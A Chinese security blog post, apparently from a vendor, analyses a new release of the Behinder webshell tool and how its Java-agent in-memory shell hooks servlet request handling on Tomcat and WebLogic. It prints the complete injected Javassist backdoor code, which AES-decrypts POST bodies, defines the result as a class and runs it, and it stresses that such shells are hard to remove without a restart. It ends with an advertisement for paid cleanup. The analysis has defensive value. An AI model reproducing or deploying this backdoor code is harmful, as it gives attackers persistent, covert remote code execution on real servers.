hw第一天,冰蝎发布了更新版本。在蛋黄狗狗的眼中,冰蝎反编译越来越简单,让更多人都可以参与魔改冰蝎的过程中。冰蝎的流量正在朝向加密化,混淆化的方向发展,对于全流量取证设备来讲压力越来越大。甚至,你真的认为部署的全流设备有用???
冰蝎更新主要有以下几点:
从流量部分来看,新版冰蝎的流量部分并没有太多变化。不出意外的话,各大安全厂商应该是可以查杀的。但是,不要忘记,新版反编译很简单,降低魔改冰蝎的门槛,也就是说,魔改流量冰蝎即将出世。
冰蝎为了实现更难清楚的目的,放弃了内存马的不落地的特征。转而使用JVM TI技术(rasp一样的技术),动态修改java http的处理部分。
下面我们来看一下怎么实现的,在注入内存马的时候,shell会通过目标操作系统的类别判断上传哪种java agentjar包。
jar包被上传后,会首先执行下面的代码,该代码反射调用com.sun.tools.attach.VirtualMachine,VirtualMachine这个类提供一些调用jvm方法的途径。该类的说明文档在这里以供查阅 https://docs.oracle.com/javase/7/docs/jdk/api/attach/spec/com/sun/tools/attach/VirtualMachine.html。
需要注意的是,目前jvm只提供了加载java agent,但是没有提供卸载java agent。也就是说加载后是无法清除的,只能从重启的角度来清除该类型内存马,如果再配合我的JVM持久化方法呢?蓝队很难做应急响应去清除该类型webshell的。
冰蝎内存马为了实现更好的兼容性,选择hook javax.servlet.http.HttpServlet#service 函数,在weblogic选择hook weblogic.servlet.internal.ServletStubImpl#execute 函数。
添加的代码很简单,获取request,response,判断请求的url是否为内存马响应的url,如果是,则进入内存马执行的流程,如果不是则不响应。这段javaassist的代码如下
System.out.println("rx0001");
javax.servlet.http.HttpServletRequest request=(javax.servlet.ServletRequest)$1;
javax.servlet.http.HttpServletResponse response = (javax.servlet.ServletResponse)$2;
javax.servlet.http.HttpSession session = request.getSession();
String pathPattern="%s";
System.out.println(request.getRequestURI());
if (request.getRequestURI().matches(pathPattern))
{
System.out.println("rx0002");
java.util.Map obj=new java.util.HashMap();
obj.put("request",request);
obj.put("response",response);
obj.put("session",session);
ClassLoader loader=this.getClass().getClassLoader();
if (request.getMethod().equals("POST"))
{
try
{
String k="%s";
session.putValue("u",k);
java.lang.ClassLoader systemLoader=java.lang.ClassLoader.getSystemClassLoader();
Class cipherCls=systemLoader.loadClass("javax.crypto.Cipher");
Object c=cipherCls.getDeclaredMethod("getInstance",new Class[]{String.class}).invoke((java.lang.Object)cipherCls,new Object[]{"AES"});
System.out.println("ccc:"+c);
Object keyObj=systemLoader.loadClass("javax.crypto.spec.SecretKeySpec").getDeclaredConstructor(new Class[]{byte[].class,String.class}).newInstance(new Object[]{k.getBytes(),"AES"});;
java.lang.reflect.Method initMethod=cipherCls.getDeclaredMethod("init",new Class[]{int.class,systemLoader.loadClass("java.security.Key")});
initMethod.invoke(c,new Object[]{new Integer(2),keyObj});
java.lang.reflect.Method doFinalMethod=cipherCls.getDeclaredMethod("doFinal",new Class[]{byte[].class});
Class Base64 = loader.loadClass("sun.misc.BASE64Decoder");
Object Decoder = Base64.newInstance();
byte[] requestBody=(byte[]) Decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(Decoder, new Object[]{request.getReader().readLine()});
byte[] buf=(byte[])doFinalMethod.invoke(c,new Object[]{requestBody});
java.lang.reflect.Method defineMethod=java.lang.ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{String.class,java.nio.ByteBuffer.class,java.security.ProtectionDomain.class});
defineMethod.setAccessible(true);
java.lang.reflect.Constructor constructor=java.security.SecureClassLoader.class.getDeclaredConstructor(new Class[]{java.lang.ClassLoader.class});
constructor.setAccessible(true);
java.lang.ClassLoader cl=(java.lang.ClassLoader)constructor.newInstance(new Object[]{loader});
java.lang.Class c=(java.lang.Class)defineMethod.invoke((java.lang.Object)cl,new Object[]{null,java.nio.ByteBuffer.wrap(buf),null});
c.newInstance().equals(obj);
}
catch(java.lang.Exception e)
{
e.printStackTrace();
}
catch(java.lang.Error error)
{
error.printStackTrace();
}
return;
}
}你以为检测这两个函数就可以了吗?不,你错了,在中间件的任何一个处理http请求的环节,都可以实现插入我们自己的字节码以做到内存马。在某一版的冰蝎中,hook的是下面tomcat特有的这个类。
理论上讲无法通过常规工具清除,除非重启,java agent在添加字节码的时候,有如下几个限制
而且经过java agent修改后的类,jvm并没有保存之前未修改的类的字节码。javaassist也没有delete method代码的功能。
但是为了在不重启业务服务器的情况下完成清除内存马,可以通过如下手段解决
当然,专业的事还是要专业的人去做,您要是感觉自己清除javaagent类型的webshell不稳容易翻车的话,不妨交给我们去完成这个任务。如有需要该类有偿服务,请后台说明来意联系我们。
当然,我也会发布工具去清除内存马,但是不保证做到不影响线上业务。请各位酌情选择。工具将会发布到知识星球中。
